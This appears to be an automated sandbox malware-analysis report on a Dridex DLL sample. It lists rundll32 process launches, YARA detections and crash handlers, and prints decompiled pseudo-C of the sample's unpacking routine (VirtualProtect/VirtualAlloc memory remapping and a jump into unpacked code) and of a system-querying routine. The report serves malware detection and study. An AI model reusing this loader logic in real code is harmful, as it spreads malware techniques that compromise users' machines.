Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.647984137.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 2940 Parent PID: 1624

General

Start time:	05:01:18
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1
Imagebase:	0x150000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3712 Parent PID: 1624

General

Start time:	05:01:18
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll,FFRgpmdlwwWde
Imagebase:	0x1260000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000003.00000000.372154068.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 3596 Parent PID: 2940

General

Start time:	05:01:18
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',#1
Imagebase:	0x1260000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000004.00000002.649606375.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5596 Parent PID: 1624

General

Start time:	05:02:42
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',CheckTrust
Imagebase:	0x1260000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 0000000E.00000002.650424736.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5964 Parent PID: 1624

General

Start time:	05:02:43
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DllCanUnloadNow
Imagebase:	0x1260000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000010.00000000.609752932.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000010.00000000.600008382.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2212 Parent PID: 1624

General

Start time:	05:02:43
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DllGetClassObject
Imagebase:	0x1260000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000011.00000002.646115407.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000011.00000000.614518127.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000011.00000000.600571038.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6120 Parent PID: 1624

General

Start time:	05:02:43
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',DownloadFile
Imagebase:	0x1260000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000012.00000000.639692678.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000012.00000002.647602284.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000012.00000000.631903118.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1112 Parent PID: 1624

General

Start time:	05:02:44
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.Drixed-FJXE53A16BEA791.13728.dll',GetICifFileFromFile
Imagebase:	0x1260000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000013.00000000.633029380.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000013.00000000.640582271.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000013.00000002.648668483.000000006ECF1000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 2512 Parent PID: 5964

General

Start time:	05:04:05
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 664
Imagebase:	0x340000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 1760 Parent PID: 2212

General

Start time:	05:04:07
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 664
Imagebase:	0x340000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 736 Parent PID: 5964

General

Start time:	05:04:11
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 5964 -s 664
Imagebase:	0x340000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 6096 Parent PID: 6120

General

Start time:	05:04:14
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6120 -s 664
Imagebase:	0x340000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: WerFault.exe PID: 1036 Parent PID: 2212

General

Start time:	05:04:14
Start date:	28/10/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 2212 -s 664
Imagebase:	0x340000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 1624 Parent PID: 5932 loaddll32.exeCOMMON

Executed Functions

Function 01252062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E01252062(long __ebx, void* __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				char* _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t139;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t180;
				intOrPtr _t223;
				void* _t230;
				intOrPtr _t233;
				void* _t240;
				intOrPtr _t244;
				intOrPtr _t255;
				intOrPtr _t266;
				DWORD* _t268;
				void* _t272;
				intOrPtr* _t275;
				intOrPtr* _t276;

				_t139 = _a4;
				_v20 = 0;
				_t240 =  *((intOrPtr*)(_t139 + 4));
				 *0x1254418 = 1;
				asm("movaps xmm0, [0x1253010]");
				asm("movups [0x1254428], xmm0");
				_v48 = _t139;
				_v52 =  *((intOrPtr*)(_t139 + 0x58));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v184 = _t240;
				_v60 =  *((intOrPtr*)(_v48 + 0x2c));
				_v180 = _v56;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t139 + 0x50));
				_v68 = 4;
				_v72 = _t240;
				_v76 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t268); // executed
				_v80 = _t147;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x38));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E012526BF();
				E012523B9(_v72,  *((intOrPtr*)(_v48 + 0x30)), _v60);
				E012526BF( *((intOrPtr*)(_v48 + 0x30)), 0, _v60);
				_t155 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t275 = _t272 - 0x88;
				_t230 = _v72;
				_t255 =  *((intOrPtr*)(_t230 + 0x3c));
				_v100 = _t155;
				_v104 = _v72 + 0x3c;
				_v108 = _t230;
				_v112 = _t255;
				if(_t255 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v152 = _v108;
				if(_v64 == 0) {
					L2:
					 *_t275 = _v72;
					_v116 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
					_t159 = DisableThreadLibraryCalls(??);
					_t276 = _t275 - 4;
					_t233 =  *_v104;
					_v120 = _t159;
					_v124 = _t233;
					_v128 = _v72;
					if(_t233 != 0) {
						_v128 = _v72 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
					}
					_t244 = _v48;
					_v44 =  *((intOrPtr*)(_t244 + 0x40));
					_v40 =  *((intOrPtr*)(_t244 + 0x54));
					_v36 =  *((intOrPtr*)(_t244 + 0x44));
					_v32 =  *((intOrPtr*)(_t244 + 0x18));
					_v28 =  *((intOrPtr*)(_t244 + 0x34));
					_v24 = _v116;
					 *_t276 = _t244;
					_v184 = 0;
					_v180 = 0x5c;
					_v156 =  &_v44;
					_v160 = 0;
					_v164 = 0x5c;
					_v168 =  *((intOrPtr*)(_v128 + 0x28));
					E012526BF();
					if(_v168 != 0) {
						_t275 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
				} else {
					_v136 = 0;
					_v132 = _v152 + 0x18 + ( *(_v152 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_v140 = _t174;
						_t266 = _v140;
						_v184 = _v72 +  *((intOrPtr*)(_t266 + 0xc));
						_v180 =  *((intOrPtr*)(_t266 + 8));
						_v176 =  *((intOrPtr*)(0x1254418 + (( *(_t174 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t174 + 0x24) >> 0x1f << 3) + (( *(_t174 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v144 = _v136;
						_t180 = VirtualProtect(??, ??, ??, ??); // executed
						_t275 = _t275 - 0x10;
						_t223 = _v144 + 1;
						_v148 = _t180;
						_v136 = _t223;
						_v132 = _v140 + 0x28;
						if(_t223 == _v64) {
							goto L2;
						}
					}
					goto L2;
				}
				return 1;
			}

0x0125206e
0x0125207c
0x01252083
0x01252086
0x01252090
0x01252097
0x012520a1
0x012520a7
0x012520b0
0x012520b9
0x012520bc
0x012520c2
0x012520c6
0x012520ce
0x012520d5
0x012520d8
0x012520db
0x012520de
0x012520e1
0x012520fb
0x01252101
0x01252104
0x0125210c
0x01252110
0x01252113
0x01252116
0x01252119
0x0125211c
0x01252138
0x01252155
0x0125217a
0x0125217c
0x01252185
0x01252188
0x01252192
0x01252195
0x01252198
0x0125219b
0x0125219e
0x0125236f
0x0125236f
0x012522ce
0x012522d4
0x012521a9
0x012521b7
0x012521bf
0x012521c2
0x012521c4
0x012521ca
0x012521d6
0x012521d9
0x012521dc
0x012521df
0x012523b1
0x012523b1
0x012522ef
0x012522f5
0x012522fb
0x01252301
0x01252307
0x0125230d
0x01252313
0x01252316
0x01252319
0x01252321
0x01252329
0x0125232f
0x01252335
0x0125233b
0x01252341
0x0125234f
0x012522bb
0x012522c1
0x012522c1
0x012522da
0x0125238e
0x01252394
0x012521ea
0x012521ea
0x01252204
0x01252229
0x01252238
0x0125223b
0x0125223f
0x01252243
0x0125224a
0x01252250
0x01252252
0x0125225b
0x0125226c
0x01252272
0x01252278
0x0125227b
0x00000000
0x00000000
0x01252281
0x00000000
0x012521ea
0x012522aa

APIs

VirtualProtect.KERNELBASE ref: 012520E1
VirtualProtect.KERNELBASE ref: 0125217A

Strings

\, xrefs: 01252321

Memory Dump Source

Source File: 00000000.00000002.642906158.0000000001250000.00000040.00000010.sdmp, Offset: 01250000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: c5469017751dd29f3987dc90c9cca2758ae64895a987bbff3722b40307c08af6
Instruction ID: e164b0314782f2d389662edd95bf2ec76979f46f6c94fa465bd62ddccdeefbd5
Opcode Fuzzy Hash: c5469017751dd29f3987dc90c9cca2758ae64895a987bbff3722b40307c08af6
Instruction Fuzzy Hash: 6E91ABB4E14219DFDB54DF99C580AADBBF1FF48310F15806AE958AB352D330A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 012521EA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 01252250

Strings

\, xrefs: 01252321

Memory Dump Source

Source File: 00000000.00000002.642906158.0000000001250000.00000040.00000010.sdmp, Offset: 01250000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: bdfc52150077666ea0d1044bfc5b11200bf9244c10f66faa808aa3c2f806c74c
Instruction ID: 7d59fb484884317edec64d2dd4610422c38ddea3321bdd31eff0bceeddf770a6
Opcode Fuzzy Hash: bdfc52150077666ea0d1044bfc5b11200bf9244c10f66faa808aa3c2f806c74c
Instruction Fuzzy Hash: EB51B0B5E10219CFDB14CF59C980A9DFBF1BF48310F6581A9DA58A7351D730A991CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01251E9D, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 01251F29

Memory Dump Source

Source File: 00000000.00000002.642906158.0000000001250000.00000040.00000010.sdmp, Offset: 01250000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction ID: 5cefeaae39e5538e9871092d74c948c72971a582b928baaa5030df1b11b1357a
Opcode Fuzzy Hash: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction Fuzzy Hash: 3C41C3B5E1421A8FDB44DFA8C4906AEBBF1FF48310F15856DE948AB340D375A850CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6ED00754, Relevance: 1.9, Strings: 1, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 78%

			E6ED00754(void* __ecx) {
				void* __esi;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				char _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t201;
				char _t204;
				void* _t213;
				void* _t214;
				char _t216;
				char _t217;
				char _t224;
				char _t239;
				char _t242;
				char _t245;
				char _t248;
				char _t251;
				char _t255;
				char _t260;
				void* _t269;
				void* _t270;
				char _t272;
				char _t273;
				void* _t277;
				char _t278;
				char _t279;
				char _t283;
				intOrPtr* _t292;
				signed char _t295;
				signed char _t296;
				intOrPtr* _t321;
				intOrPtr* _t326;
				intOrPtr* _t348;
				intOrPtr* _t364;
				char _t365;
				intOrPtr* _t370;
				intOrPtr* _t373;
				intOrPtr* _t378;
				char _t383;
				char _t384;
				char _t385;
				char _t386;
				char _t387;
				char _t388;
				char _t394;
				char _t396;
				char _t402;
				char _t404;
				intOrPtr* _t405;
				signed int _t407;
				intOrPtr* _t410;
				intOrPtr* _t412;
				signed int _t414;
				void* _t415;
				void* _t416;
				char _t421;
				intOrPtr* _t424;
				void* _t426;
				intOrPtr* _t428;
				void* _t429;
				void* _t430;

				_t415 = __ecx;
				_t155 =  *0x6ed0d1f8;
				if(_t155 == 0x255be0d1) {
					_t155 = E6ED035F4(0x30);
					 *0x6ed0d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t415 != 0) {
					_t416 = _t429 + 0x48;
					E6ED03670(_t416, 0, 0x11c);
					_t430 = _t429 + 0xc;
					 *((intOrPtr*)(_t430 + 0x48)) = 0x11c;
					if(E6ED03044(0x10154545, 0x51a0195c, 0x10154545, 0x10154545) != 0) {
						_push(_t416);
						asm("int3");
						asm("int3");
					}
					_t405 =  *0x6ed0d1f8;
					_t159 = _t430 + 0x4c;
					_t295 =  *_t159;
					 *(_t405 + 8) = _t295;
					_t296 = _t159[4];
					 *(_t405 + 9) = _t296;
					 *((char*)(_t405 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t405 + 4)) =  *((intOrPtr*)(_t430 + 0x54));
					 *((char*)(_t405 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t405 = (_t296 & 0x000000ff) + ((_t295 & 0x000000ff) << 4) - 0x50;
					_t162 = E6ED0101C(_t405);
					 *((intOrPtr*)(_t430 + 0x198)) = 0;
					 *((char*)( *0x6ed0d1f8 + 0xb)) = _t162;
					_t364 = E6ED03044(0x8b9d0da7, 0x8335dc52, _t162, _t162);
					if(_t364 == 0) {
						L12:
						_t365 = 0;
						L13:
						 *((char*)( *0x6ed0d1f8 + 0x28)) = _t365;
						if( *((intOrPtr*)(E6ED00754(0))) >= 0x10) {
							_push(6);
							memcpy(_t430 + 0x164, 0x6ed0bce0, 0 << 2);
							_t430 = _t430 + 0xc;
							 *((intOrPtr*)(_t430 + 0x1c)) = 0;
							E6ECFF5A8(_t430 + 0x24, 0);
							_t407 = 0;
							__eflags = 0;
							do {
								E6ECFF84C(_t430 + 0x24, E6ECFF4F0(_t430 + 0x20) + 4);
								 *((intOrPtr*)(E6ECFF4E0(_t430 + 0x24, E6ECFF4F0(_t430 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t430 + 0x164 + _t407 * 4));
								_t407 = _t407 + 1;
								 *((intOrPtr*)(_t430 + 0x1c)) =  *((intOrPtr*)(_t430 + 0x1c)) + 1;
								__eflags = _t407 - 6;
							} while (_t407 < 6);
							_push(0);
							E6ED05558(_t430 + 0xc, _t430 + 0x1c, 0x80000002);
							E6ECFF678(_t430 + 0x20);
							E6ED05588(_t430 + 8, _t430 + 0x1c0, 0x5e9822cf);
							_t180 = E6ED0583C(_t430 + 4, __eflags,  *((intOrPtr*)(_t430 + 0x1c0)));
							_t408 = _t180;
							E6ECFDFDC(_t430 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6ED05588(_t430 + 8, _t430 + 0x1c8, 0x80c4a2b7);
								_t421 = E6ED0583C(_t430 + 4, __eflags,  *((intOrPtr*)(_t430 + 0x1c8)));
								E6ECFDFDC(_t430 + 0x1c8);
								_t408 = _t430 + 0x1d0;
								E6ED05588(_t430 + 8, _t430 + 0x1d0, 0xa89c042f);
								_t402 = E6ED0583C(_t430 + 4, __eflags,  *((intOrPtr*)(_t430 + 0x1d0)));
								E6ECFDFDC(_t430 + 0x1d0);
								__eflags = _t421;
								if(_t421 != 0) {
									__eflags = _t421 - 5;
									if(_t421 != 5) {
										__eflags = _t421 - 2;
										if(_t421 != 2) {
											L58:
											E6ECFD020(_t430 + 0xc);
											__eflags =  *((char*)(_t430 + 8));
											if( *((char*)(_t430 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *((intOrPtr*)(_t430 + 4)) = 0;
												goto L66;
											}
											_t383 =  *((intOrPtr*)(_t430 + 4));
											__eflags = _t383;
											if(_t383 == 0) {
												L61:
												_t239 = 1;
												L63:
												__eflags = _t239;
												if(_t239 == 0) {
													E6ED05530(_t383);
												}
												goto L65;
											}
											__eflags = _t383 - 0xffffffff;
											if(_t383 != 0xffffffff) {
												_t239 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t402 - 1;
										if(_t402 != 1) {
											goto L58;
										}
										E6ECFD020(_t430 + 0xc);
										__eflags =  *((char*)(_t430 + 8));
										if( *((char*)(_t430 + 8)) == 0) {
											L57:
											 *((intOrPtr*)(_t430 + 4)) = 0;
											_t189 = 5;
											goto L66;
										}
										_t384 =  *((intOrPtr*)(_t430 + 4));
										__eflags = _t384;
										if(_t384 == 0) {
											L53:
											_t242 = 1;
											L55:
											__eflags = _t242;
											if(_t242 == 0) {
												E6ED05530(_t384);
											}
											goto L57;
										}
										__eflags = _t384 - 0xffffffff;
										if(_t384 != 0xffffffff) {
											_t242 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t402;
									if(_t402 != 0) {
										__eflags = _t402 - 1;
										if(_t402 == 1) {
											E6ECFD020(_t430 + 0xc);
											__eflags =  *((char*)(_t430 + 8));
											if( *((char*)(_t430 + 8)) == 0) {
												L121:
												 *((intOrPtr*)(_t430 + 4)) = 0;
												_t189 = 4;
												goto L66;
											}
											_t385 =  *((intOrPtr*)(_t430 + 4));
											__eflags = _t385;
											if(_t385 == 0) {
												L117:
												_t245 = 1;
												L119:
												__eflags = _t245;
												if(_t245 == 0) {
													E6ED05530(_t385);
												}
												goto L121;
											}
											__eflags = _t385 - 0xffffffff;
											if(_t385 != 0xffffffff) {
												_t245 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6ECFD020(_t430 + 0xc);
									__eflags =  *((char*)(_t430 + 8));
									if( *((char*)(_t430 + 8)) == 0) {
										L45:
										 *((intOrPtr*)(_t430 + 4)) = 0;
										_t189 = 3;
										goto L66;
									}
									_t386 =  *((intOrPtr*)(_t430 + 4));
									__eflags = _t386;
									if(_t386 == 0) {
										L41:
										_t248 = 1;
										L43:
										__eflags = _t248;
										if(_t248 == 0) {
											E6ED05530(_t386);
										}
										goto L45;
									}
									__eflags = _t386 - 0xffffffff;
									if(_t386 != 0xffffffff) {
										_t248 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t402;
								if(_t402 != 0) {
									goto L58;
								}
								E6ECFD020(_t430 + 0xc);
								__eflags =  *((char*)(_t430 + 8));
								if( *((char*)(_t430 + 8)) == 0) {
									L35:
									 *((intOrPtr*)(_t430 + 4)) = 0;
									_t189 = 2;
									goto L66;
								}
								_t387 =  *((intOrPtr*)(_t430 + 4));
								__eflags = _t387;
								if(_t387 == 0) {
									L31:
									_t251 = 1;
									L33:
									__eflags = _t251;
									if(_t251 == 0) {
										E6ED05530(_t387);
									}
									goto L35;
								}
								__eflags = _t387 - 0xffffffff;
								if(_t387 != 0xffffffff) {
									_t251 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6ECFD020(_t430 + 0xc);
							__eflags =  *((char*)(_t430 + 8));
							if( *((char*)(_t430 + 8)) == 0) {
								L25:
								 *((intOrPtr*)(_t430 + 4)) = 0;
								_t189 = 1;
								goto L66;
							}
							_t388 =  *((intOrPtr*)(_t430 + 4));
							__eflags = _t388;
							if(_t388 == 0) {
								L21:
								_t255 = 1;
								L23:
								__eflags = _t255;
								if(_t255 == 0) {
									E6ED05530(_t388);
								}
								goto L25;
							}
							__eflags = _t388 - 0xffffffff;
							if(_t388 != 0xffffffff) {
								_t255 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6ed0d1f8 + 0x24)) = _t189;
							_t190 = E6ED01054(0xffffffffffffffff);
							_t321 =  *0x6ed0d1f8;
							 *((char*)(_t321 + 0x29)) = _t190;
							 *((intOrPtr*)(_t321 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t321 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6ed0d1f8 + 0x2c)) = E6ED010C8(0xffffffffffffffff);
								L78:
								_t370 = E6ED03044(0x10154545, 0xccc77b1, 0x10154545, 0x10154545);
								if(_t370 != 0) {
									 *_t370(_t430 + 0x164);
								}
								_t196 =  *0x6ed0d1f8;
								_t292 = _t430 + 0x178;
								_t410 = _t430 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t292;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t292 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t292 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t410;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t410 + 0x10));
								return _t196;
							}
							 *((intOrPtr*)(_t430 + 0x19c)) = 0;
							_t373 = E6ED03044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
							if(_t373 == 0) {
								L74:
								_t201 =  *0x6ed0d1f8;
								if( *((char*)(_t201 + 0x28)) == 0) {
									 *((intOrPtr*)(_t201 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t201 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t430 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t373() == 0) {
								_t204 = E6ED035C8(_t408);
								__eflags = _t204;
								if(_t204 != 0) {
									goto L74;
								}
							}
							 *((intOrPtr*)(_t430 + 0x30)) =  *((intOrPtr*)(_t430 + 0x19c));
							 *((char*)(_t430 + 0x34)) = 1;
							 *((intOrPtr*)(_t430 + 0x1a4)) = 0;
							_t326 = E6ED03044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7);
							if(_t326 != 0) {
								_push(_t430 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *((intOrPtr*)(_t430 + 0x1ac)));
								if( *_t326() == 0) {
									E6ED035C8(_t408);
								}
							}
							_t207 =  *((intOrPtr*)(_t430 + 0x1a4));
							if( *((intOrPtr*)(_t430 + 0x1a4)) != 0) {
